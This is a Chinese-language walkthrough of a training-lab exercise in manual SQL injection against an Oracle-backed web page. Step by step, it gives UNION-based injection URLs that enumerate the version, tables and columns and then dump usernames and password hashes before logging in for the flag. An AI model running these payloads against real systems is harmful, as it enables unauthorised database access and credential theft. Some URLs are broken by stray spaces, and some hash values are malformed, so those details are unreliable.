SQL手工注入漏洞测试(Oracle数据库)——墨者学院

1.寻找注入点

点击图中红色方框位置寻找注入点

 注入点如图所示

2.判断闭合方式

使用and 1=1和and 1=2进行判断

 判断出类型为字符型

3.判断字段列数

older by 2

http://124.70.64.48:49603/new_list.php?id=1 order by 2

order by 3

http://124.70.64.48:49603/new_list.php?id=1 order by 3

 2为真，3为假，判断出为2列

 4.寻找注入点

http://124.70.64.48:49603/new_list.php?id=1 union select 'null','null' from dual

 5.查询数据库版本信息

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select banner from sys.v_$version where rownum=1) from dual

6.查询当前数据库库名

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select instance_name from V$INSTANCE) from dual

 

 7.查询数据库表名

 

 http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1) from dual

 第一张表叫'LOGMNR_SESSION_EVOLVE$'

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$') from dual

第二张表叫'LOGMNR_GLOBAL$'

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where rownum=1 and table_name not in 'LOGMNR_SESSION_EVOLVE$' and table_name not in 'LOGMNR_GLOBAL$' ) from dual

第三种表叫 LOGMNR_GT_TAB_INCLUDES

模糊查询

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select table_name from user_tables where table_name like '%user%' and rownum=1 ) from dual

找到目标表'sns_users'

8.查询数据库列名

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 )from dual

 找到列’USER_NAME‘

http://124.70.64.48:49603/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1and column_name not in 'USER_NAME' )from dual

找到列'USER_PWD'

http://124.70.64.48:47475/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME' and column_name not in 'USER_PWD'  )from dual

 找到列’STATUS‘

http://124.70.64.48:47475/new_list.php?id=1 union select 'null',(select column_name from user_tab_columns where table_name='sns_users' and rownum=1 and column_name not in 'USER_NAME' and column_name not in 'USER_PWD' and column_name not in 'STATUS' )from dual

无任何返回信息说明找到了全部列： ’USER_NAME‘，'USER_PWD' ，’STATUS‘

9.查询数据库数据获取账号密码的字段内容

http://124.70.64.48:47475/ new_list . php ? id =- 1 union select USER_NAME , USER_PWD from "sns_users" where r ownum= 1

USER_NAME=zhong

USER_PWD=1c63129ae9asc60asdua94d3e00495

http://124.70.64.48:47475/ new_list . php ? id =- 1 union select USER_NAME , USER_PWD from "sns_users" where r ownum= 1 and USER_NAME <> 'zhong'

USER_NAME=hu

USER_PWD=1c63129ae9db9g20asdua94d3e00495

http://124.70.64.48:47475/ new_list . php ? id =- 1 union select USER_NAME , USER_PWD from "sns_users" where rownum= 1 and USER_NAME <> 'zhong' and USER_NAME not in 'hu'

 

 USER_NAME=mozhe

USER_PWD=2c3b41177293cad3fccf79a69ac398f2

由于密码由MD5加密，所以需要解码

解码后输入账号和密码进行登录

 

拿到key

 

通关！！！！